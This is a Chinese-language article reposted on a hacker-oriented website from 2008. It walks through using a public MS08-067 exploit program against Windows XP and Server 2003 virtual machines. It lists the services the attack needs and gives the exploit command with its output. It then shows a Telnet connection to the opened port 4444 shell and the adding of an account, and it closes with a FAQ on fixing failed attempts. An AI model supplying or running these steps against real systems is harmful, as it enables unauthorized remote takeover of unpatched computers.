基地首页 | 基地文章 | 基地动画 | 基地软件 | 技术论坛 | 会员学院
 
 
热门搜索:安全 安全工具 网络安全 会员培训 安全动画 安全
攻防总结免费资源网赚文章网管技巧防火墙技术端口入侵Sniffer嗅探arp技术
DDOS攻防3389攻防灰鸽子文章逆向工程破解实例加密技术脱壳技术溢出漏洞
serv-u漏洞社会工程学渗透技术跨站技术提权技术
 您现在的位置: 新世纪网安基地 >> 文章 >> 菜鸟宝典 >> 文章正文
Ms08-067 Exp 详细测试流程(图文)
作者:admin    文章来源:转载    点击数:    更新时间:2008-10-29

Writed By 樱木花盗
Blog:www.03389.com
为了测试这个,我装了三个虚拟机。。。一两个XP一个2003,终于弄明白都需要哪些必要条件了,写出来和大家分享,希望对离成功还差一步的同学们有所帮助,感谢幻影的牛人放出MS08-067的Exp,自由,共享。

下载:MS08-067.rar

经过N+1次的测试之后发现,本机和目标机必须要开启以下服务,否则就算对方没有打补丁也会失败。
Server、Computer Browser、Workstation。
下面测试开始(和我局域网的同学们的电脑我都会第一时间叫他们打补丁。。。这次没法儿用他们的电脑测试了,我只好装虚拟机测试)
在cmd下直接运行 MS08-067.exe 出现命令帮助

MS08-067.exe <Server>
很简单,只需要输入 MS08-067.exe IP  就可以了。

MS08-067 Exploit for CN by EMM@ph4nt0m.org
目标机为虚拟机(IP 192.168.1.2),攻击者为本机(IP 192.168.1.188)
虚拟机端口开放如下:

 

输入命令:
MS08-067.exe 192.168.1.2
提示:
SMB Connect OK!
Send Payload Over!

 

再次查看虚拟机的端口:

 

我们看到当我们运行了 MS08-067.exe 192.168.1.2 之后,虚拟机的端口出现了个 4444 端口,状态为 LISTENING ,这时就说明已经溢出成功了,接下来我们在本机运行
Telnet 192.168.1.2 4444
就可以了Telnet登陆到目标机了。
执行个命令加个帐户看看,成功了~

 

测试到此结束,以下关于此次测试大家可能遇到的几个问题我在这里集中回答下。

Q:我的 服务 里没有 Server 这个服务怎么办?
A:在 本地连接-属性 里 点 安装-服务-添加-Microsoft 网络的文件和打印机共享 ,点确定,会提示是否重启,其实不用重启就可以,在服务里按F5刷新一下就有这个服务了。

Q:提示
SMB Connect OK!
RpcExceptionCode() = 1722
这样溢出成功了么?
A:溢出失败,对方开启了防火墙。

Q:提示
Make SMB Connection error:1203
是怎么回事?
A:对方没有开机联网或者没有安装 Microsoft 网络的文件和打印机共享 协议 或没有启动Server服务。

『关闭该页』 『打印该页』

  • 上一篇文章:
  • 责任编辑:Wangtianxiang 
  • 下一篇文章: 没有了
  • 最近更新
    推荐文章让你彩虹QQ显示你的IP
    推荐文章不让自己显示在彩虹QQ
    推荐文章盗版Windows XP系统避
    推荐文章DOS命令综合学习版
    推荐文章不怕服务器被入侵---搞
    推荐文章黑客攻防:网页挂马攻
    推荐文章ADSL搭配无线路由器组
    推荐文章HTML七种加密解密
    推荐文章实例讲解:管理员常用D
    推荐文章一步一步教你用U盘进入
    热门文章
    推荐文章不让自己显示在彩虹QQ
    普通文章知道手机号码如何查到
    推荐文章盗版Windows XP系统避
    普通文章突破网吧上网限制 我只
    推荐文章DOS命令综合学习版
    普通文章清理你入侵后的三个重
    普通文章系统开机密码忘了不着
    普通文章一次局域网入侵全过程
    普通文章Win 2003下无敌权限提
    普通文章20个省力的特殊的执行
    相关文章
    让Windows XP跑得更快更
    横刀植入 拿下Phpcms网站
    妙用搜索引擎快照突破限
    没有路由密码权限时的鸽
    让你彩虹QQ显示你的IP一
    牛人站长曝高招 让你的网
    微软MS08-067远程控制漏
    Google手机上市即曝严重
    3389新思路
    自由动力(My Power)3.6 
    揭开微软背后的“黑屏魔
    load_file() 入侵时查看
    一种防注入代码的绕过学
    专家:微软最牛RPC漏洞M
    突破IP地址限制看电影
    利用SA权限入侵的其他方
    扔掉工具,让你飞速学会
    “回收站”里暗藏的小秘
    黑客大搜捕 共享软件的十
    自由动力(My Power)3.6 
    关于我们 | 加入会员 | 网安商城 | 投稿方法 | 广告报价| 友情连接 | 网站地图 | 网安论坛网安招聘
    加入会员咨询QQ:65444425 投稿方法: 广告与合作QQ:9324223

    浙ICP备06031184号